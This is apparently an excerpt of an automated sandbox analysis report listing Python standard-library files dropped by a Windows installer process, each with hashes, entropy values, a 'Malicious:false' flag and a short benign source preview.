                                                                                                                                Preview:"""..Basic subprocess implementation for POSIX which only uses os functions. Only..implement features required by setup.py to build C extension modules when..subprocess is unavailable. setup.py is not used on Windows..."""..import os......# distutils.spawn used by distutils.command.build_ext..# calls subprocess.Popen().wait()..class Popen:.. def __init__(self, cmd, env=None):.. self._cmd = cmd.. self._env = env.. self.returncode = None.... def wait(self):.. pid = os.fork().. if pid == 0:.. # Child process.. try:.. if self._env is not None:.. os.execve(self._cmd[0], self._cmd, self._env).. else:.. os.execv(self._cmd[0], self._cmd).. finally:.. os._exit(1).. else:.. # Parent process.. _, status = os.waitpid(pid, 0).. self.returncode = os.waitstatus_to_exitcode(status).... return self.ret
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):31314
                                                                                                                                Entropy (8bit):4.5456929708365745
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:IOnTX1Ewkx023y0SuqlTWbbYXxeF6tTgA/rTNq4bRyneWtvVUth:lnTYYh4kqeivVUth
                                                                                                                                MD5:6E729A0A2EE49293265CE5B3A7FFF9EF
                                                                                                                                SHA1:E813A823415DD4E0B0B62272D0DB9C0C3902C196
                                                                                                                                SHA-256:07653C161374FB79C8F6D2688CF3AE1B6A6E5F4C973FB3D39329B6FDD83CF43F
                                                                                                                                SHA-512:6F2EED3E1D10C1C778CE22E57A3102635C90337EF1C1D32D94E023F723D2A063C344351995AEEB3BE3C8CF2742F1E72DF54E080D8D9BC5F61F6E6DECC6B10740
                                                                                                                                Malicious:false
                                                                                                                                Preview:# Copyright 2007 Google, Inc. All Rights Reserved...# Licensed to PSF under a Contributor Agreement....."""Abstract Base Classes (ABCs) for collections, according to PEP 3119.....Unit tests are in test_collections..."""....from abc import ABCMeta, abstractmethod..import sys....GenericAlias = type(list[int])..EllipsisType = type(...)..def _f(): pass..FunctionType = type(_f)..del _f....__all__ = ["Awaitable", "Coroutine",.. "AsyncIterable", "AsyncIterator", "AsyncGenerator",.. "Hashable", "Iterable", "Iterator", "Generator", "Reversible",.. "Sized", "Container", "Callable", "Collection",.. "Set", "MutableSet",.. "Mapping", "MutableMapping",.. "MappingView", "KeysView", "ItemsView", "ValuesView",.. "Sequence", "MutableSequence",.. "ByteString",.. ]....# This module has been renamed from collections.abc to _collections_abc to..# speed up interpreter startup. Some of the types such as MutableMapping ar
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):9013
                                                                                                                                Entropy (8bit):5.071668224051392
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:jX+gYVVcndom2qXur3co6d/f1OlQcrG5EbhqRbRq:T+gYVVcnrkco6d/f1OlQcC5ES1q
                                                                                                                                MD5:4373F824346A53ECD29028BEF4655F56
                                                                                                                                SHA1:88727AA744742F6C1C528C92DAA928C84933D995
                                                                                                                                SHA-256:10C81E8803CFFAAC8BDF085CD01EA948C3ADFA32263B2D452BAFD5B5519410F6
                                                                                                                                SHA-512:4032ABD13CB607F3D018B41D1B62EBB57195A54D0ED0F7E1F3D32BCA565A1D837BCA75E8E032296ADC25C9A1BB07C0AA77EB696DACEE2EC5065A49EDF7798A28
                                                                                                                                Malicious:false
                                                                                                                                Preview:# This module is used to map the old Python 2 names to the new names used in..# Python 3 for the pickle module. This needed to make pickle streams..# generated with Python 2 loadable by Python 3.....# This is a copy of lib2to3.fixes.fix_imports.MAPPING. We cannot import..# lib2to3 and use the mapping defined there, because lib2to3 uses pickle...# Thus, this could cause the module to be imported recursively...IMPORT_MAPPING = {.. '__builtin__' : 'builtins',.. 'copy_reg': 'copyreg',.. 'Queue': 'queue',.. 'SocketServer': 'socketserver',.. 'ConfigParser': 'configparser',.. 'repr': 'reprlib',.. 'tkFileDialog': 'tkinter.filedialog',.. 'tkSimpleDialog': 'tkinter.simpledialog',.. 'tkColorChooser': 'tkinter.colorchooser',.. 'tkCommonDialog': 'tkinter.commondialog',.. 'Dialog': 'tkinter.dialog',.. 'Tkdnd': 'tkinter.dnd',.. 'tkFont': 'tkinter.font',.. 'tkMessageBox': 'tkinter.messagebox',.. 'ScrolledText': 'tkinter.scrolledtext',.. 'Tkconstants':
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):5843
                                                                                                                                Entropy (8bit):4.312570122004757
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:ArOasdGagyvLQOAj+pPbO6bf/Zvlf0rwazuza6:eOasdbtlb/fcrwazuza6
                                                                                                                                MD5:F75E9299E14E9B11FD7DAE94D061253E
                                                                                                                                SHA1:6025D13A35D283496DC83444366FE93E22B03B61
                                                                                                                                SHA-256:A10CF1A317374641BCDB8252499E9CB9D4D6E774AC724EDFDDDD0433EAD771D9
                                                                                                                                SHA-512:BEE88E9C44A2477E7679F47F414FF8327AD06EF4E81D65405A1D55E9684040838C9F30F3F0A35FF0C5A7E850B858FE83E48734BE7EA171A1F5DBB75FB45A2FB7
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Internal classes used by the gzip, lzma and bz2 modules"""....import io..import sys....BUFFER_SIZE = io.DEFAULT_BUFFER_SIZE # Compressed data read chunk size......class BaseStream(io.BufferedIOBase):.. """Mode-checking helper functions.""".... def _check_not_closed(self):.. if self.closed:.. raise ValueError("I/O operation on closed file").... def _check_can_read(self):.. if not self.readable():.. raise io.UnsupportedOperation("File not open for reading").... def _check_can_write(self):.. if not self.writable():.. raise io.UnsupportedOperation("File not open for writing").... def _check_can_seek(self):.. if not self.readable():.. raise io.UnsupportedOperation("Seeking is only supported ".. "on files open for reading").. if not self.seekable():.. raise io.UnsupportedOperation("The underlying file object "..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):15049
                                                                                                                                Entropy (8bit):4.144690404366886
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:hJdW3aalUU2IJWEY4tokA+jFW/tFoak6iExy/LemE/9ueOU:hJRalUU2IJWIo+jEFGaw1iN
                                                                                                                                MD5:2DFE8125174DDC3D0694E41EB8489C58
                                                                                                                                SHA1:EF097AC9988D1E06BE47D771008B53797682156D
                                                                                                                                SHA-256:914361CF055D5D2E1B69A2603A5C94B22DEDB987D72CE9F791AFEC0524718F28
                                                                                                                                SHA-512:E5657D6619EA50AEE6051808F5C153B75438C97231010F898D9884937C7370241C4C41FA695B002D1AEA0489994F4FD96D3ADE037ECF30D761A99019F9E1E043
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Shared support for scanning document type declarations in HTML and XHTML.....This module is used as a foundation for the html.parser module. It has no..documented public API and should not be used directly....."""....import re...._declname_match = re.compile(r'[a-zA-Z][-_.a-zA-Z0-9]*\s*').match.._declstringlit_match = re.compile(r'(\'[^\']*\'|"[^"]*")\s*').match.._commentclose = re.compile(r'--\s*>').._markedsectionclose = re.compile(r']\s*]\s*>')....# An analysis of the MS-Word extensions is available at..# http://www.planetpublish.com/xmlarena/xap/Thursday/WordtoXML.pdf...._msmarkedsectionclose = re.compile(r']\s*>')....del re......class ParserBase:.. """Parser base class which provides some common support methods used.. by the SGML/HTML and XHTML parsers.""".... def __init__(self):.. if self.__class__ is ParserBase:.. raise RuntimeError(.. "_markupbase.ParserBase must be subclassed").... def reset(self):.. self.lineno = 1..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):22361
                                                                                                                                Entropy (8bit):4.723787766897489
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:KEQb8Fu0jFaUTj065gw4DehE58J+pPSUbjaMVqnV6sxlVItVnCfvQY+yLq6NT:KB8Fu0jFaYj0sgve81pP3SAYy2
                                                                                                                                MD5:FC4CA3F0DD53369CBDE78E6F34D6D1E0
                                                                                                                                SHA1:EF1914BA73779F330B6EBB6F68752E5302F4C5E4
                                                                                                                                SHA-256:66881ABF03400804BC29B465BE8A6560A78EFED1F7CED3FAF9FECAA586157B00
                                                                                                                                SHA-512:6E6D3F2D62200478381E337872F27F65C86650D88F6E69ADBFB25FD90B9F2A94466253D6670727863DD33A9318F11D800E754E2969BE183DF5B2C1E18FBC0834
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Shared OS X support functions."""....import os..import re..import sys....__all__ = [.. 'compiler_fixup',.. 'customize_config_vars',.. 'customize_compiler',.. 'get_platform_osx',..]....# configuration variables that may contain universal build flags,..# like "-arch" or "-isdkroot", that may need customization for..# the user environment.._UNIVERSAL_CONFIG_VARS = ('CFLAGS', 'LDFLAGS', 'CPPFLAGS', 'BASECFLAGS',.. 'BLDSHARED', 'LDSHARED', 'CC', 'CXX',.. 'PY_CFLAGS', 'PY_LDFLAGS', 'PY_CPPFLAGS',.. 'PY_CORE_CFLAGS', 'PY_CORE_LDFLAGS')....# configuration variables that may contain compiler calls.._COMPILER_CONFIG_VARS = ('BLDSHARED', 'LDSHARED', 'CC', 'CXX')....# prefix added to original configuration variable names.._INITPRE = '_OSX_SUPPORT_INITIAL_'......def _find_executable(executable, path=None):.. """Tries to find 'executable' in the directories listed in 'path'..... A string listing dir
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):6336
                                                                                                                                Entropy (8bit):4.398612520141537
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:tChBz2a5ZMoU3JhZqwCtb4kmAp0PT5L7AH4/kt/E/StLp/kL/5:tChtjgJhZZKb4qH/7O
                                                                                                                                MD5:E9F2D6D09F06D7E0772B74B32759881C
                                                                                                                                SHA1:6E4A2145565B7B9436CB7DB5CF18FA97E9B3BEE0
                                                                                                                                SHA-256:8F790C97331A66EA442964314843F7CC8863FB3D9B899183F6D02598D4361A5C
                                                                                                                                SHA-512:D3D22D17387A04B79AB54C7F71E994A075AB309057A8F98A3972E0F17535C4D905342D282ECF3D1A8A99351BBC8AEC207E7E277B0377255572153A80EFBB07A6
                                                                                                                                Malicious:false
                                                                                                                                Preview:from _weakrefset import WeakSet......def get_cache_token():.. """Returns the current ABC cache token..... The token is an opaque object (supporting equality testing) identifying the.. current version of the ABC cache for virtual subclasses. The token changes.. with every call to ``register()`` on any ABC... """.. return ABCMeta._abc_invalidation_counter......class ABCMeta(type):.. """Metaclass for defining Abstract Base Classes (ABCs)..... Use this metaclass to create an ABC. An ABC can be subclassed.. directly, and then acts as a mix-in class. You can also register.. unrelated concrete classes (even built-in classes) and unrelated.. ABCs as 'virtual subclasses' -- these and their descendants will.. be considered subclasses of the registering ABC by the built-in.. issubclass() function, but the registering ABC won't show up in.. their MRO (Method Resolution Order) nor will method.. implementations defined by the registering ABC be callable
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):235627
                                                                                                                                Entropy (8bit):4.563494689950572
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6144:PPpNAkfLyemfbPcKcNZuUxOapxHPfm+LymnEvD:3vxPA
                                                                                                                                MD5:A5D7FA08D9B08BE788675FD40E834D2B
                                                                                                                                SHA1:59857473C6622325D42ABDA0C342C73F26F6893B
                                                                                                                                SHA-256:6D4CF984A4E2710E41736DB533ECB27E8144FF93756CC07571130C7049E6AA6A
                                                                                                                                SHA-512:1C9EAF1090948465BC0EADCDC14F72737D44C751FAB4AE816D241B91149ADBC6C25295146D9375A256E492E5645EF61482818F8273F881B7723690861E6410A5
                                                                                                                                Malicious:false
                                                                                                                                Preview:# Copyright (c) 2004 Python Software Foundation...# All rights reserved.....# Written by Eric Price <eprice at tjhsst.edu>..# and Facundo Batista <facundo at taniquetil.com.ar>..# and Raymond Hettinger <python at rcn.com>..# and Aahz <aahz at pobox.com>..# and Tim Peters....# This module should be kept in sync with the latest updates of the..# IBM specification as it evolves. Those updates will be treated..# as bug fixes (deviation from the spec is a compatibility, usability..# bug) and will be backported. At this point the spec is stabilizing..# and the updates are becoming fewer, smaller, and less significant....."""..This is an implementation of decimal floating point arithmetic based on..the General Decimal Arithmetic Specification:.... http://speleotrove.com/decimal/decarith.html....and IEEE standard 854-1987:.... http://en.wikipedia.org/wiki/IEEE_854-1987....Decimal floating point has finite precision with arbitrarily large bounds.....The purpose of this modul
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):96745
                                                                                                                                Entropy (8bit):4.365797863767
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:viNtkV5SOW4oT4fWEai+6zQWB/5bjQsRgmRA+d:viNtkrZkuWEai+6cWp5bjLKmRT
                                                                                                                                MD5:7CF81255416C1C42EF7F60C09AB73CF6
                                                                                                                                SHA1:94FDD9ADDB15ABED002AB88C41BE22802C873ADD
                                                                                                                                SHA-256:4A4C710BFEABD6761B943DBE5A506C01977BA93403AD74225C2148A83917A9D1
                                                                                                                                SHA-512:34A460A9C682B12F2193E79634A3EAED1689864A7C7939DD82EF3B617C84B54E742EA1154EE88955772A20C17F6C51E583EA75C803BA42843A1545BFF92F075F
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""..Python implementation of the io module..."""....import os..import abc..import codecs..import errno..import stat..import sys..# Import _thread instead of threading to reduce startup cost..from _thread import allocate_lock as Lock..if sys.platform in {'win32', 'cygwin'}:.. from msvcrt import setmode as _setmode..else:.. _setmode = None....import io..from io import (__all__, SEEK_SET, SEEK_CUR, SEEK_END)....valid_seek_flags = {0, 1, 2} # Hardwired values..if hasattr(os, 'SEEK_HOLE') :.. valid_seek_flags.add(os.SEEK_HOLE).. valid_seek_flags.add(os.SEEK_DATA)....# open() uses st_blksize whenever we can..DEFAULT_BUFFER_SIZE = 8 * 1024 # bytes....# NOTE: Base classes defined here are registered with the "official" ABCs..# defined in io.py. We don't use real inheritance though, because we don't want..# to inherit the C implementations.....# Rebind for compatibility..BlockingIOError = BlockingIOError....# Does io.IOBase finalizer log the exception if the close() method fails?
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3231
                                                                                                                                Entropy (8bit):4.290837712719538
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:LCIcLnTrq7B8nUOOU3ciXy0JFBOjpQ8sHLf1vHKGysSO4:LmnTWjOOU3cc0+rxHKGB94
                                                                                                                                MD5:2E95AAF9BD176B03867862B6DC08626A
                                                                                                                                SHA1:3AFA2761119AF29519DC3DAD3D6C1A5ABCA67108
                                                                                                                                SHA-256:924F95FD516ECAEA9C9AF540DC0796FB15EC17D8C42B59B90CF57CFE15962E2E
                                                                                                                                SHA-512:080495FB15E7C658094CFE262A8BD884C30580FD6E80839D15873F27BE675247E2E8AEC603D39B614591A01ED49F5A07DD2ACE46181F14B650C5E9EC9BB5C292
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""..The objects used by the site module to add custom builtins..."""....# Those objects are almost immortal and they keep a reference to their module..# globals. Defining them in the site module would keep too many references..# alive...# Note this means this module should also avoid keep things alive in its..# globals.....import sys....class Quitter(object):.. def __init__(self, name, eof):.. self.name = name.. self.eof = eof.. def __repr__(self):.. return 'Use %s() or %s to exit' % (self.name, self.eof).. def __call__(self, code=None):.. # Shells like IDLE catch the SystemExit, but listen when their.. # stdin wrapper is closed... try:.. sys.stdin.close().. except:.. pass.. raise SystemExit(code)......class _Printer(object):.. """interactive prompt objects for printing the license text, a list of.. contributors and the copyright notice.""".... MAXLINES = 23.... def __init__(self, name,
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):25856
                                                                                                                                Entropy (8bit):4.576262974956046
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:C1pVFxVyOs4/p6WSDmyeMjjiIltKcKdrxrTZprdw2W6dNtxz/kNVGC/JrbruMREb:C1FxIO7/p6Woph/5uZTvVrz/g3HuMQCi
                                                                                                                                MD5:B4CB6BF5E35DC2F8A8D10014F66A72C0
                                                                                                                                SHA1:8461CA8CFE93FBC0FC385A03428E9B248BE750C7
                                                                                                                                SHA-256:770CD20E1D9381A3850401868BF1CA375C6BF5AEC7F8E031B6210DF98D789E3F
                                                                                                                                SHA-512:775762E38D0CA8B954D37DF4BD8CAF76ACD97C3399C0774592D01494A2F2141C2C2EBB4DC29E2A40ACE01A81C46E5EC76FAB9744ABCFDFEC826BDDF83E61B5D2
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Strptime-related classes and functions.....CLASSES:.. LocaleTime -- Discovers and stores locale-specific time information.. TimeRE -- Creates regexes for pattern matching a string of text containing.. time information....FUNCTIONS:.. _getlang -- Figure out what language is being used for the locale.. strptime -- Calculates the time struct represented by the passed-in string...."""..import time..import locale..import calendar..from re import compile as re_compile..from re import IGNORECASE..from re import escape as re_escape..from datetime import (date as datetime_date,.. timedelta as datetime_timedelta,.. timezone as datetime_timezone)..from _thread import allocate_lock as _thread_allocate_lock....__all__ = []....def _getlang():.. # Figure out what the current language is set to... return locale.getlocale(locale.LC_TIME)....class LocaleTime(object):.. """Stores and handles locale-specific information relat
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):7462
                                                                                                                                Entropy (8bit):4.6221334949688195
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:/RCb6QO/SjgBOiCX1BfaOajqBG2DI0WFwoV4KLgKxDl0D3YzgDPYhFSnRKipzXhH:DQO6kBOiCXSO5BZIr4aCYUsho9R
                                                                                                                                MD5:2ACCB96019A97C9B237FA45AB4E67BBF
                                                                                                                                SHA1:E1C573319C6E01E1222EAD90E5C34C58D22021EF
                                                                                                                                SHA-256:27BB2BD201E6157EFDD807EC5E3F3C5A8E0EA2EA2E86ED475A59DE8C6442A0EB
                                                                                                                                SHA-512:26F75E0A32F02E85C3258F7B37440FC83C775AB64B31497217A2090228CAE2EF732166B5E07865DDCC0D82FD69CF80EA2F3DA020C7FCA8F09E39390EB768F04D
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Thread-local objects.....(Note that this module provides a Python version of the threading.local.. class. Depending on the version of Python you're using, there may be a.. faster one available. You should always import the `local` class from.. `threading`.)....Thread-local objects support the management of thread-local data...If you have data that you want to be local to a thread, simply create..a thread-local object and use its attributes:.... >>> mydata = local().. >>> mydata.number = 42.. >>> mydata.number.. 42....You can also access the local-object's dictionary:.... >>> mydata.__dict__.. {'number': 42}.. >>> mydata.__dict__.setdefault('widgets', []).. [].. >>> mydata.widgets.. []....What's important about thread-local objects is that their data are..local to a thread. If we access the data in a different thread:.... >>> log = [].. >>> def f():.. ... items = sorted(mydata.__dict__.items()).. ... log.append(items).. ... mydata.number = 11.. ... l
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):6098
                                                                                                                                Entropy (8bit):4.192824803537849
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:EBC2FPYi/mDV2/2vGd24QB2oa+qBdXsBWP4m4FE8445m4IinbyQqVRA6U4e4nC8s:ELj/7euM4QgoofXsU4m4FH4484I+byFW
                                                                                                                                MD5:06C63C4624FB2BE6BEFD2E832B3B4BC2
                                                                                                                                SHA1:D373F09FCAC33928E9F5330B0C6D1CFDB2F73B0A
                                                                                                                                SHA-256:CF8031A6E21150438F3D2964C4152615B91A03894616D5B6930E0F14F44DABDA
                                                                                                                                SHA-512:24D7CD2E0959E90DE5E4D252BCB655376833A948B03E99E2CE727CE115BFFE0247475D9EF096A4AACAFDBD1D3681031F44E63DE9A77B221B444C4FC40574A86E
                                                                                                                                Malicious:false
                                                                                                                                Preview:# Access WeakSet through the weakref module...# This code is separated-out because it is needed..# by abc.py to load everything else at startup.....from _weakref import ref..from types import GenericAlias....__all__ = ['WeakSet']......class _IterationGuard:.. # This context manager registers itself in the current iterators of the.. # weak container, such as to delay all removals until the context manager.. # exits... # This technique should be relatively thread-safe (since sets are)..... def __init__(self, weakcontainer):.. # Don't create cycles.. self.weakcontainer = ref(weakcontainer).... def __enter__(self):.. w = self.weakcontainer().. if w is not None:.. w._iterating.add(self).. return self.... def __exit__(self, e, t, b):.. w = self.weakcontainer().. if w is not None:.. s = w._iterating.. s.remove(self).. if not s:.. w._commit_removals()......class Weak
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):6713
                                                                                                                                Entropy (8bit):4.483378403190208
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:gPAaxlPl/yqe//e/2Dkpps4mWt3O0Tml91BbnTLikZOz9Cj9bObNbYGO7U:gPAaxlP1u9kv+0TmnTLikZW9CxbOJbYQ
                                                                                                                                MD5:B877ED65FC102E9E87F108EC68F32DB8
                                                                                                                                SHA1:006B5ED81AD2DBA79F7F201271C5EEDDDEF856F3
                                                                                                                                SHA-256:C01BA83C5602D006EFBF5868D53075CB6997AA069B4B6C6E2C6155CB282D9E0A
                                                                                                                                SHA-512:CA12429B57497AE2BAB8655D6968B962A7237FDF00179509102902D6E118B2748D658C5424A7CAAB8A257DC844427549238A03BA8BF89F4AF0B3629DD8969D53
                                                                                                                                Malicious:false
                                                                                                                                Preview:# Copyright 2007 Google, Inc. All Rights Reserved...# Licensed to PSF under a Contributor Agreement....."""Abstract Base Classes (ABCs) according to PEP 3119."""......def abstractmethod(funcobj):.. """A decorator indicating abstract methods..... Requires that the metaclass is ABCMeta or derived from it. A.. class that has a metaclass derived from ABCMeta cannot be.. instantiated unless all of its abstract methods are overridden... The abstract methods can be called using any of the normal.. 'super' call mechanisms. abstractmethod() may be used to declare.. abstract methods for properties and descriptors..... Usage:.... class C(metaclass=ABCMeta):.. @abstractmethod.. def my_abstract_method(self, ...):.. ..... """.. funcobj.__isabstractmethod__ = True.. return funcobj......class abstractclassmethod(classmethod):.. """A decorator indicating abstract classmethods..... Deprecated, use 'classmethod' with 'ab
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):35195
                                                                                                                                Entropy (8bit):4.473668543181026
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:Ob3TMIq3JRejezqFTTQjJFUT2uXUmwlKjevW7ZigkLmS3V2XpRY:4MHDejezqFvgAT2u/NKvW7dkZlMY
                                                                                                                                MD5:29B0B8756C6385B118FE2DFB14C14E60
                                                                                                                                SHA1:D4B227129C2AC363985958C029A49E262009C968
                                                                                                                                SHA-256:36A33CB62BCE2EEFC61AD2C7C7555407404481A9543F1C366C32CDE3513D8A14
                                                                                                                                SHA-512:72E9E6E6657648214AA3103191350ABD395C9F18632E1AB0B8B288F2F20FCF082866565EEB3423B05E3FCE3009210EA0323417021BE7F8B7AD5CE9F2E26A0EA7
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Stuff to parse AIFF-C and AIFF files.....Unless explicitly stated otherwise, the description below is true..both for AIFF-C files and AIFF files.....An AIFF-C file has the following structure..... +-----------------+.. | FORM |.. +-----------------+.. | <size> |.. +----+------------+.. | | AIFC |.. | +------------+.. | | <chunks> |.. | | . |.. | | . |.. | | . |.. +----+------------+....An AIFF file has the string "AIFF" instead of "AIFC".....A chunk consists of an identifier (4 bytes) followed by a size (4 bytes,..big endian order), followed by the data. The size field does not include..the size of the 8 byte header.....The following chunk types are recognized..... FVER.. <version number of AIFF-C defining document> (AIFF-C only)... MARK.. <# of markers> (2 bytes).. list of markers:.. <marker ID> (2 bytes, must be > 0).. <position> (4 bytes).. <marker nam
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):517
                                                                                                                                Entropy (8bit):5.2580863991460935
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:HHoBI/BiIkjuVyGkjvluzAbx1uVEiE9rBX2y:HzJiOVyGkRuYSkVX2y
                                                                                                                                MD5:3ED5C3D928783BE91A9C8FCA6BCB846E
                                                                                                                                SHA1:2104F146AA389C6FC4BF172A082A711F9515A1EE
                                                                                                                                SHA-256:2C4879A527D2F5D0E0F0D81837EEB8510E2F77FDF2BBB2688835732E699CCD6A
                                                                                                                                SHA-512:2BC5200EF030A876C374AD3A31D189777C3C57759C6DB0BAB3C33265BB74ADD2FDDAAE20EDC646A7722386934D093C47C42CFC8AF24A5340C7D8D926A9D3505F
                                                                                                                                Malicious:false
                                                                                                                                Preview:..import webbrowser..import hashlib....webbrowser.open("https://xkcd.com/353/")....def geohash(latitude, longitude, datedow):.. '''Compute geohash() using the Munroe algorithm..... >>> geohash(37.421542, -122.085589, b'2005-05-26-10458.68').. 37.857713 -122.544543.... '''.. # https://xkcd.com/426/.. h = hashlib.md5(datedow, usedforsecurity=False).hexdigest().. p, q = [('%f' % float.fromhex('0.' + x)) for x in (h[:16], h[16:32])].. print('%d%s %d%s' % (latitude, p[1:], longitude, q[1:]))..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):101814
                                                                                                                                Entropy (8bit):4.311553738378426
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:g3gKb2hik3RLsuQCvu7fQEy17udHC91vhAxaGWt:gQKb2hik3aQu7fQEy17udc1vixaG2
                                                                                                                                MD5:AA5ECD43EE07705C19013DF0334CE22D
                                                                                                                                SHA1:220DFDDE6A3FF51D98CB48082B595601F2830E9B
                                                                                                                                SHA-256:692565CD51F72006DE1ED3AC07167DD49D08A7496D6DEFB4A4151A3D97BBE574
                                                                                                                                SHA-512:862658A588C0672B9DBB92BF6BDB6FE3E68A95FA24A6B67F650D90950AA8BA8BAB1D4F7331599CCBB6868386BA1474AFE02ABB39B32718B611268A88BDEA7862
                                                                                                                                Malicious:false
                                                                                                                                Preview:# Author: Steven J. Bethard <steven.bethard@gmail.com>...# New maintainer as of 29 August 2019: Raymond Hettinger <raymond.hettinger@gmail.com>...."""Command-line parsing library....This module is an optparse-inspired command-line parsing library that:.... - handles both optional and positional arguments.. - produces highly informative usage messages.. - supports parsers that dispatch to sub-parsers....The following is a simple usage example that sums integers from the..command-line and writes the result to a file::.... parser = argparse.ArgumentParser(.. description='sum the integers at the command line').. parser.add_argument(.. 'integers', metavar='int', nargs='+', type=int,.. help='an integer to be summed').. parser.add_argument(.. '--log', default=sys.stdout, type=argparse.FileType('w'),.. help='the file where the sum should be written').. args = parser.parse_args().. args.log.write('%s' % sum(args.integers)).. args.lo
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):62074
                                                                                                                                Entropy (8bit):4.410274312722967
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:pZlWC/yNX9e8T8Y+XqfdANHWiIgliQ1wDl1:pZ8GyNX9aqeNHTIglz181
                                                                                                                                MD5:50B7ECA553612E5F3ABDFC50F8A2EA24
                                                                                                                                SHA1:26029B70AE6793D12F73D967DEE06C278642C9F5
                                                                                                                                SHA-256:D60556B09F3F44DBE7F90E50042713A043C8018272DBB033251D6FB74A2C4021
                                                                                                                                SHA-512:774ACA6FF4B42C90F85351B1A2EA673834B606274DD6C76FA619B106007142293414159F524C5C44F8D1D6A55B97E89B320F751A1BD48592B0C53CADEF137F2C
                                                                                                                                Malicious:false
                                                                                                                                Preview:""".. ast.. ~~~.... The `ast` module helps Python applications to process trees of the Python.. abstract syntax grammar. The abstract syntax itself might change with.. each Python release; this module helps to find out programmatically what.. the current grammar looks like and allows modifications of it..... An abstract syntax tree can be generated by passing `ast.PyCF_ONLY_AST` as.. a flag to the `compile()` builtin function or by using the `parse()`.. function from this module. The result will be a tree of objects whose.. classes all inherit from `ast.AST`..... A modified abstract syntax tree can be compiled into a Python code object.. using the built-in `compile()` function..... Additionally various helper functions are provided that make working with.. the trees simpler. The main intention of the helper functions and this.. module in general is to provide an easy to use interface for libraries.. that work tightly with the python sy
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):11884
                                                                                                                                Entropy (8bit):4.544340291668485
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:jrq3jJ1vi4b0/AwyG5XcoIhlJCmO7IDzAEyeWdm2aIb:fq3jJRtiARG9comK7KzAEyeWdm4
                                                                                                                                MD5:431D5B07A4410B2FD0B0413B508162B9
                                                                                                                                SHA1:9618954026B520987E4AEDD549F2308DA93037DF
